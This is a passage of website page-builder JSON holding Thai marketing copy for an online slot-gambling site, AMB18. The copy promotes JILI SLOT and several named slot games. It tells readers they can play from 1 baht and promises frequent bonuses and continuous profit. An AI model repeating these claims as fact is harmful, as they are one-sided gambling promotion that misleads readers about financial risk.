u0e15\\u0e25\\u0e4c\\u0e15\\u0e19\\u0e40\\u0e2d\\u0e07 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e16\\u0e39\\u0e01\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1a\\u0e19\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e35\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e20\\u0e32\\u0e1e \\u0e20\\u0e32\\u0e1e\\u0e44\\u0e21\\u0e48\\u0e01\\u0e23\\u0e30\\u0e15\\u0e38\\u0e01 \\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19 \\u0e01\\u0e32\\u0e23\\u0e17\\u0e35\\u0e48\\u0e17\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e36\\u0e07\\u0e40\\u0e01\\u0e21\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e2a\\u0e23\\u0e34\\u0e21\\u0e17\\u0e31\\u0e1e \\u0e08\\u0e36\\u0e07\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1e\\u0e25\\u0e15\\u0e1f\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e23\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e25\\u0e38\\u0e49\\u0e19\\u0e01\\u0e33\\u0e44\\u0e23\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e43\\u0e19\\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e17\\u0e35\\u0e48\\u0e40\\u0e23\\u0e49\\u0e32\\u0e43\\u0e08<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21 JILI SLOT<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">JILI SLOT \\u0e42\\u0e14\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e43\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e40\\u0e19\\u0e49\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e1b\\u0e25\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e2b\\u0e25\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e41\\u0e1a\\u0e1a\\u0e04\\u0e32\\u0e14\\u0e44\\u0e21\\u0e48\\u0e16\\u0e36\\u0e07 \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e17\\u0e31\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e22 \\u0e42\\u0e17\\u0e19\\u0e2a\\u0e35\\u0e2a\\u0e14\\u0e43\\u0e2a \\u0e14\\u0e36\\u0e07\\u0e14\\u0e39\\u0e14\\u0e2a\\u0e32\\u0e22\\u0e15\\u0e32 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e21\\u0e48\\u0e19\\u0e48\\u0e32\\u0e40\\u0e1a\\u0e37\\u0e48\\u0e2d \\u0e19\\u0e2d\\u0e01\\u0e08\\u0e32\\u0e01\\u0e19\\u0e35\\u0e49\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e28\\u0e36\\u0e01\\u0e29\\u0e32\\u0e41\\u0e19\\u0e27\\u0e17\\u0e32\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u00a0<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cbf6885\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-1-1-1.webp\",\"id\":351,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ff86a53\",\"elType\":\"widget\",\"settings\":{\"title\":\" AMB18 \\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c \\u0e41\\u0e21\\u0e49\\u0e21\\u0e35\\u0e07\\u0e1a\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 \\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e01\\u0e47\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e34\\u0e2a\\u0e23\\u0e30 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 1 \\u0e1a\\u0e32\\u0e17\\n\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"55e80bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e07\\u0e1a\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19\\u0e27\\u0e48\\u0e32\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c\\u0e41\\u0e21\\u0e49\\u0e21\\u0e35\\u0e07\\u0e1a\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 \\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e01\\u0e47\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e34\\u0e2a\\u0e23\\u0e30\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 1 \\u0e1a\\u0e32\\u0e17\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e19\\u0e15\\u0e48\\u0e33\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e27\\u0e1a\\u0e04\\u0e38\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e44\\u0e14\\u0e49\\u0e07\\u0e48\\u0e32\\u0e22\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e15\\u0e32\\u0e21\\u0e07\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e07\\u0e27\\u0e25\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33\\u0e2a\\u0e39\\u0e07\\u0e40\\u0e01\\u0e34\\u0e19\\u0e44\\u0e1b \\u0e01\\u0e32\\u0e23\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e17\\u0e38\\u0e19\\u0e08\\u0e36\\u0e07\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e22\\u0e37\\u0e14\\u0e2b\\u0e22\\u0e38\\u0e48\\u0e19 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1c\\u0e31\\u0e19\\u0e1c\\u0e27\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e0a\\u0e2d\\u0e1a\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22\\u0e41\\u0e1a\\u0e1a\\u0e01\\u0e33\\u0e44\\u0e23\\u0e40\\u0e25\\u0e47\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e01\\u0e47\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e44\\u0e14\\u0e49\\u0e15\\u0e32\\u0e21\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e23\\u0e27\\u0e21\\u0e01\\u0e31\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e25\\u0e48\\u0e2d\\u0e07\\u0e15\\u0e31\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2cd57df\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e41\\u0e2b\\u0e25\\u0e48\\u0e07\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2e\\u0e34\\u0e15 \\u0e19\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1a\\u0e19 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21 \\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e01\\u0e21\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e17\\u0e35\\u0e48\\u0e04\\u0e27\\u0e23\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49e7be0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e35\\u0e49\\u0e01\\u0e47\\u0e04\\u0e37\\u0e2d\\u0e41\\u0e2b\\u0e25\\u0e48\\u0e07\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2e\\u0e34\\u0e15\\u0e19\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1a\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e01\\u0e21\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e17\\u0e35\\u0e48\\u0e04\\u0e27\\u0e23\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e04\\u0e31\\u0e14\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e01\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e2e\\u0e34\\u0e15\\u0e15\\u0e34\\u0e14\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a\\u0e21\\u0e32\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e15\\u0e32\\u0e21\\u0e2b\\u0e32\\u0e40\\u0e01\\u0e21\\u0e14\\u0e31\\u0e07\\u0e08\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e23\\u0e27\\u0e21\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e2a\\u0e23\\u0e23\\u0e1e\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e40\\u0e01\\u0e21\\u0e21\\u0e35\\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27\\u0e17\\u0e31\\u0e49\\u0e07\\u0e43\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e01\\u0e32\\u0e23\\u0e08\\u0e48\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e01\\u0e21\\u0e04\\u0e38\\u0e13\\u0e20\\u0e32\\u0e1e\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e01\\u0e25 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23\\u0e17\\u0e35\\u0e48\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e33\\u0e19\\u0e27\\u0e19\\u0e21\\u0e32\\u0e01\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32\\u0e02\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ecb961\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d266248\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ab58bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #99cc00;\\\"><b>AMB18 <\\/b><b>\\u0e40\\u0e01\\u0e21 Wild West Gold <\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Wild West Gold \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e18\\u0e35\\u0e21\\u0e04\\u0e32\\u0e27\\u0e1a\\u0e2d\\u0e22\\u0e17\\u0e35\\u0e48\\u0e42\\u0e14\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e41\\u0e25\\u0e30\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e43\\u0e19\\u0e14\\u0e34\\u0e19\\u0e41\\u0e14\\u0e19\\u0e15\\u0e30\\u0e27\\u0e31\\u0e19\\u0e15\\u0e01\\u0e2a\\u0e38\\u0e14\\u0e14\\u0e34\\u0e1a \\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e07\\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e17\\u0e34\\u0e28\\u0e17\\u0e32\\u0e07 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e23\\u0e49\\u0e32\\u0e43\\u0e08\\u0e43\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e19\\u0e34\\u0e22\\u0e21\\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21 Bonanza Gold\\u00a0<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Bonanza Gold \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e19\\u0e27\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e07\\u0e17\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e48\\u0e32\\u0e22\\u0e41\\u0e1a\\u0e1a\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21\\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e15\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e08\\u0e32\\u0e01\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e02\\u0e36\\u0e49\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e2d\\u0e1a\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e42\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e2a\\u0e35\\u0e17\\u0e2d\\u0e07\\u0e42\\u0e14\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19 \\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e01\\u0e32\\u0e23\\u0e25\\u0e38\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e21\\u0e02\\u0e49\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e17\\u0e49\\u0e32\\u0e17\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e04\\u0e32\\u0e14\\u0e40\\u0e14\\u0e32\\u0e1c\\u0e25\\u0e25\\u0e31\\u0e1e\\u0e18\\u0e4c\\u0e43\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e2b\\u0e21\\u0e38\\u0e19<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21 The Dog House Megaways<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">The Dog House Megaways \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e43\\u0e0a\\u0e49\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e21\\u0e01\\u0e30\\u0e40\\u0e27\\u0e22\\u0e4c \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e08\\u0e33\\u0e19\\u0e27\\u0e19\\u0e27\\u0e34\\u0e18\\u0e35\\u0e0a\\u0e19\\u0e30\\u0e43\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e32\\u0e22\\u0e15\\u0e31\\u0e27 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e1a\\u0e49\\u0e32\\u0e19\\u0e2a\\u0e38\\u0e19\\u0e31\\u0e02\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e04\\u0e07\\u0e17\\u0e35\\u0e48\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e1a\\u0e19\\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d 